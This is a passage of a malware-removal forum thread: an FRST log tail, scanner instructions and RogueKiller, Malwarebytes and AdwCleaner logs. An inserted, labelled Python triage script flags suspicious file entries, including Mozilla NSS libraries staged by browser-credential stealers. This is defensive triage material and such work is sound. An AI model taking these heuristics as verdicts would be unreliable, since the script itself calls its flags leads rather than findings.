    Process Name: C:\Program Files\WinRAR\WinRAR.exe
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    ==================== Memory info ===========================

    Processor: Pentium(R) Dual-Core CPU T4400 @ 2.20GHz
    Percentage of memory in use: 23%
    Total physical RAM: 8059.98 MB
    Available physical RAM: 6126.46 MB
    Total Virtual: 9979.98 MB
    Available Virtual: 7991.81 MB

    ==================== Drives ================================

    Drive c: () (Fixed) (Total:97.66 GB) (Free:79.17 GB) NTFS
    Drive e: (Abebi) (Fixed) (Total:125.81 GB) (Free:21.43 GB) NTFS

    \\?\Volume{134fa4c9-0000-0000-0000-100000000000}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows 7/8/10) (Size: 223.6 GB) (Disk ID: 134FA4C9)
    Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 2: (Not Active) - (Size=97.7 GB) - (Type=07 NTFS)
    Partition 3: (Not Active) - (Size=125.8 GB) - (Type=0F Extended)

    ==================== End of Addition.txt ============================
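
The two FRST logs above list loose binaries in the roots of ProgramData, Program Files (x86), AppData\Local and Temp, several with 1601 timestamps, a directory called ImagingEngine.dll, and a crashing cloudnet.exe under Temp\csrss. The script below is an added example of the first-pass triage an analyst runs over such lines; it is not part of this thread and not FRST's own logic. The sample lines and the username "u" are constructed to mirror the shapes in the logs, and the parenthesised company field is assumed to be the file's version-info CompanyName, which any binary can claim and which is not a code signature.

```python
"""First-pass triage of FRST file-listing lines.

Added example: not part of the thread above and not FRST's own logic.
The sample lines and the username "u" are constructed to mirror the shapes
of the "Files in the root of some directories" and "Some files in TEMP"
sections; the (company) field is assumed to be the file's version-info
CompanyName, which any binary can claim and which is not a signature.
"""
import re
from pathlib import PureWindowsPath

# <created> - <modified> - <size> <attrs> (<company>) <path>
FILE_LINE = re.compile(
    r"^(?P<created>\d{4}-\d{2}-\d{2} \d{2}:\d{2}) - "
    r"(?P<modified>\d{4}-\d{2}-\d{2} \d{2}:\d{2}) - "
    r"(?P<size>\d{9}) (?P<attrs>[_A-Z]{5}) "
    r"\((?P<company>[^)]*)\) (?P<path>.+)$"
)

EXEC_EXT = {".exe", ".dll", ".scr", ".sys", ".cpl", ".ocx"}
# Legitimate software installs into a subfolder of these; a loose binary
# sitting directly in one of them is worth a look.
STAGING_ROOTS = (r"c:\programdata", r"c:\program files",
                 r"c:\program files (x86)", r"\appdata\local", r"\appdata\roaming")
# Mozilla NSS libraries outside a Mozilla product install are a common
# staging pattern of browser-credential stealers, which load them to
# decrypt saved Firefox logins.
NSS_LIBS = {"nss3.dll", "mozglue.dll", "softokn3.dll", "freebl3.dll"}
SYSTEM_NAMES = r"\\(csrss|svchost|lsass|winlogon|explorer)\\"

# Constructed sample, patterned on the log sections above (not a copy of them).
SAMPLE = r"""
Some files in TEMP:
====================
2019-02-08 22:11 - 2019-02-09 07:48 - 000000004 _____ () C:\ProgramData\lock.dat
1601-01-03 21:26 - 1601-01-03 21:26 - 000058368 ____N (Microsoft Corporation) C:\Program Files (x86)\iUOI.exe
2019-02-08 21:45 - 2019-02-08 21:45 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2019-02-08 21:45 - 2019-02-08 21:45 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
2019-02-08 22:22 - 2019-02-09 08:52 - 000000000 ____D () C:\Users\u\AppData\Local\Temp\ImagingEngine.dll
2019-02-09 07:03 - 2019-02-09 07:03 - 000512000 _____ () C:\Users\u\AppData\Local\Temp\csrss\cloudnet.exe
2015-09-10 13:08 - 2015-09-10 13:08 - 000032768 _____ () C:\Windows\SYSTEM32\licensemanagerapi.dll
"""


def parse_file_line(line):
    """Return the fields of one FRST file entry, or None for any other line."""
    m = FILE_LINE.match(line.strip())
    return m.groupdict() if m else None


def triage_entry(e):
    """Return the triage flags raised by one parsed entry (leads, not verdicts)."""
    flags = []
    p = PureWindowsPath(e["path"])
    low, parent, ext = str(p).lower(), str(p.parent).lower(), p.suffix.lower()
    is_dir = "D" in e["attrs"]          # FRST marks directories with a D flag

    if e["created"].startswith("1601") or e["modified"].startswith("1601"):
        flags.append("timestamp at the FILETIME epoch (1601): stomped or never set")
    if is_dir and ext in EXEC_EXT:
        flags.append(f"directory named like a {ext} binary: masquerade")
    if ext in EXEC_EXT and not is_dir:
        if any(parent.endswith(r) for r in STAGING_ROOTS):
            flags.append(f"executable dropped loose in {p.parent}")
        if "\\temp\\" in low:
            flags.append("executable under a Temp directory")
        if re.search(SYSTEM_NAMES, low):
            flags.append("path borrows a Windows system process name")
    if (e["company"].lower() == "microsoft corporation"
            and not low.startswith("c:\\windows\\") and "microsoft" not in parent):
        flags.append("claims Microsoft CompanyName outside C:\\Windows (not a signature)")
    if p.name.lower() in NSS_LIBS and not re.search(r"mozilla|firefox|thunderbird", low):
        flags.append("Mozilla NSS library outside a Mozilla install: stealer staging")
    return flags


def triage(lines):
    """Map each flagged path to its flags; non-entry lines are skipped."""
    out = {}
    for line in lines:
        e = parse_file_line(line)
        if e and (flags := triage_entry(e)):
            out[e["path"]] = flags
    return out


if __name__ == "__main__":
    for path, flags in triage(SAMPLE.splitlines()).items():
        print(path)
        for f in flags:
            print("   -", f)
```

Run against a real FRST.txt by feeding its lines to triage(); every flag is a reason to pull the file for signature and hash checks, not a verdict on its own, and the Microsoft CompanyName rule in particular will also catch legitimately redistributed runtime DLLs dropped next to a payload.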

  12. #12
    Join Date
    Jul 2008
    Posts
    232
    MWB is still busy blocking the malware even after the scan.. ampf!

  13. #13
    Join Date
    Dec 2007
    Location
    Daly City, CA
    Posts
    22,377
    Avast is fine and it's free.

    Download RogueKiller from one of the following links and save it to your Desktop:

    Link 1
    Link 2
    • Close all the running programs
    • Double click on downloaded setup.exe file to install the program.
    • Click on Start Scan button.
    • Click on another Start Scan button.
    • Wait until the Status box shows Scan Finished
    • Click on Remove Selected.
    • Wait until the Status box shows Deleting Finished.
    • Click on Report and copy/paste the content of the Notepad into your next reply.
    • RKreport.txt could also be found on your desktop.
    • If more than one log is produced post all logs.

    Please download Malwarebytes to your desktop.
    • Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
    • Then click Finish.
    • Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
    • If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
    • When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
    • Restart your computer when prompted to do so.
    • The Scan log is available through History -> Application logs. Please post its contents in your next reply.

    Please download AdwCleaner by Xplode and save to your Desktop.
    • Double click on AdwCleaner.exe to run the tool.
      Vista/Windows 7/8/10 users right-click and select Run As Administrator
    • The tool will start to update the database if one is required.
    • Click on the Scan button.
    • AdwCleaner will begin...be patient as the scan may take some time to complete.
    • After the scan has finished, click on the Logfile button.
    • A window will open which lists the logs of your scans.
    • Click on the Scan tab.
    • Double-click the most recent scan which will be at the top of the list....the log will appear.
    • Review the results...see note below
    • After reviewing the log, click on the Clean button.
    • Press OK when asked to close all programs and follow the onscreen prompts.
    • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
    • After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
    • To open a Cleaning log, launch AdwCleaner, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
    • Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
    • Copies of all logfiles are saved to C:\AdwCleaner.

    -- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.

  14. #14
    Join Date
    Jul 2008
    Posts
    232
    RogueKiller Anti-Malware V13.1.4.0 (x64) [Feb 4 2019] (Free) by Adlice Software
    mail : https://adlice.com/contact/
    Website : https://adlice.com/download/roguekiller/
    Operating System : Windows 10 (10.0.10240) 64 bits
    Started in : Normal mode
    User : Thomazing! [Administrator]
    Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
    Signatures : 20190204_072850, Driver : Loaded
    Mode : Standard Scan, Scan -- Date : 2019/02/11 07:11:47 (Duration : 00:17:22)

    ¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤

    Malwarebytes
    www.malwarebytes.com

    -Log Details-
    Scan Date: 2/11/19
    Scan Time: 7:30 AM
    Log File: ccc3d460-2d8b-11e9-b3ab-0026b664e783.json

    -Software Information-
    Version: 3.7.1.2839
    Components Version: 1.0.538
    Update Package Version: 1.0.9200
    License: Trial

    -System Information-
    OS: Windows 10 (Build 10240.16487)
    CPU: x64
    File System: NTFS
    User: DESKTOP-OHFLJFD\Thomazing!

    -Scan Summary-
    Scan Type: Threat Scan
    Scan Initiated By: Manual
    Result: Completed
    Objects Scanned: 244845
    Threats Detected: 1
    Threats Quarantined: 1
    Time Elapsed: 3 min, 16 sec

    -Scan Options-
    Memory: Enabled
    Startup: Enabled
    Filesystem: Enabled
    Archives: Enabled
    Rootkits: Disabled
    Heuristics: Enabled
    PUP: Detect
    PUM: Detect

    -Scan Details-
    Process: 0
    (No malicious items detected)

    Module: 0
    (No malicious items detected)

    Registry Key: 0
    (No malicious items detected)

    Registry Value: 0
    (No malicious items detected)

    Registry Data: 0
    (No malicious items detected)

    Data Stream: 0
    (No malicious items detected)

    Folder: 0
    (No malicious items detected)

    File: 1
    Adware.Csdimonetize, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\GLOBAL_INSTALLER.EXE, Quarantined, [2891], [637435],1.0.9200

    Physical Sector: 0
    (No malicious items detected)

    WMI: 0
    (No malicious items detected)


    (end)

  15. #15
    Join Date
    Jul 2008
    Posts
    232
    # -------------------------------
    # Malwarebytes AdwCleaner 7.2.7.0
    # -------------------------------
    # Build: 01-30-2019
    # Database: 2019-01-25.2 (Local)
    # Support: https://www.malwarebytes.com/support
    #
    # -------------------------------
    # Mode: Clean
    # -------------------------------
    # Start: 02-11-2019
    # Duration: 00:00:00
    # OS: Windows 10 Pro
    # Cleaned: 0
    # Failed: 0


    ***** [ Services ] *****

    No malicious services cleaned.

    ***** [ Folders ] *****

    No malicious folders cleaned.

    ***** [ Files ] *****

    No malicious files cleaned.

    ***** [ DLL ] *****

    No malicious DLLs cleaned.

    ***** [ WMI ] *****

    No malicious WMI cleaned.

    ***** [ Shortcuts ] *****

    No malicious shortcuts cleaned.

    ***** [ Tasks ] *****

    No malicious tasks cleaned.

    ***** [ Registry ] *****

    No malicious registry entries cleaned.

    ***** [ Chromium (and derivatives) ] *****

    No malicious Chromium entries cleaned.

    ***** [ Chromium URLs ] *****

    No malicious Chromium URLs cleaned.

    ***** [ Firefox (and derivatives) ] *****

    No malicious Firefox entries cleaned.

    ***** [ Firefox URLs ] *****

    No malicious Firefox URLs cleaned.


    *************************

    [+] Delete Tracing Keys
    [+] Reset Winsock

    *************************

    AdwCleaner[S00].txt - [2783 octets] - [09/02/2019 12:30:40]
    AdwCleaner[C00].txt - [2657 octets] - [09/02/2019 12:46:19]
    AdwCleaner[S01].txt - [1371 octets] - [11/02/2019 07:45:20]

    ########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########



    # -------------------------------
    # Malwarebytes AdwCleaner 7.2.7.0
    # -------------------------------
    # Build: 01-30-2019
    # Database: 2019-01-25.2 (Local)
    # Support: https://www.malwarebytes.com/support
    #
    # -------------------------------
    # Mode: Scan
    # -------------------------------
    # Start: 02-11-2019
    # Duration: 00:00:16
    # OS: Windows 10 Pro
    # Scanned: 31769
    # Detected: 0


    ***** [ Services ] *****

    No malicious services found.

    ***** [ Folders ] *****

    No malicious folders found.

    ***** [ Files ] *****

    No malicious files found.

    ***** [ DLL ] *****

    No malicious DLLs found.

    ***** [ WMI ] *****

    No malicious WMI found.

    ***** [ Shortcuts ] *****

    No malicious shortcuts found.

    ***** [ Tasks ] *****

    No malicious tasks found.

    ***** [ Registry ] *****

    No malicious registry entries found.

    ***** [ Chromium (and derivatives) ] *****

    No malicious Chromium entries found.

    ***** [ Chromium URLs ] *****

    No malicious Chromium URLs found.

    ***** [ Firefox (and derivatives) ] *****

    No malicious Firefox entries found.

    ***** [ Firefox URLs ] *****

    No malicious Firefox URLs found.


    AdwCleaner[S00].txt - [2783 octets] - [09/02/2019 12:30:40]
    AdwCleaner[C00].txt - [2657 octets] - [09/02/2019 12:46:19]

    ########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S01].txt ##########


    Fraud and trojans still pop up and are blocked by mwb.

    Btw, it seems your instructions are old, like from 10 years ago. Maybe you should update them. It's different now.
